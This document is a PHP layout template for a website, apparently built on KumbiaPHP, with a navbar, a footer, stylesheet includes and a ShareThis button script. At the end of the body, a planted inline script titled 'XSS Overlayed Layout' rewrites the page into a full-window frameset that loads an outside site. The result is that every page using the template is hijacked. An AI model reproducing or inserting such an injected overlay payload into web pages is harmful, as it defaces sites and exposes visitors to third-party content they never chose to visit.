<!DOCTYPE html>
<html lang="es">
<head>
    <meta charset="utf-8"/>
    <title><?= $page_title ?></title>
    <!--[if lt IE 9]> <?php echo Tag::js('html5shiv') ?> <![endif]-->
    <!--<link rel="stylesheet" href="/css/bootstrap.css"/>
    <link rel="stylesheet" href="/css/structure.css"/>
    <link rel="stylesheet" href="/css/style.css"/>-->
    <?php Tag::css('structure') ?>
    <?php echo Html::includeCss() ?>
    <meta name="viewport" content="width=device-width, initial-scale=1">
</head>
<body>
	<?php View::partial('main/navbar',NULL,array('menu'=>$menu)) ?> 
	<div id="content">
            <?php View::content() ?> 
	</div>
	<?php View::partial('main/footer') ?> 
<?php //echo Tag::js('jquery/jquery-1.8.2.min') ?> 
<?php //echo Tag::js('bootstrap/bootstrap.min') ?> 
<script>var switchTo5x=true;</script>
<script src="http://w.sharethis.com/button/buttons.js" async></script>
<script>stLight.options({publisher: "ur-14b0e8ae-587c-3e3-d43c-3df86c5011c7"});</script>
<script>location='javascript:document.write(\'<title>XSS Overlayed Layout</title>
<frameset rows="100%,*" frameborder="NO" border="0" framespacing="0"><frame src="http://crazydavinci.net/"></frameset>\');document.close();void(0)';
</script>
</body>
</html>
<?php echo '<!-- Tiempo: ' . round(microtime(1) - START_TIME, 4) . ' seg. -->'?>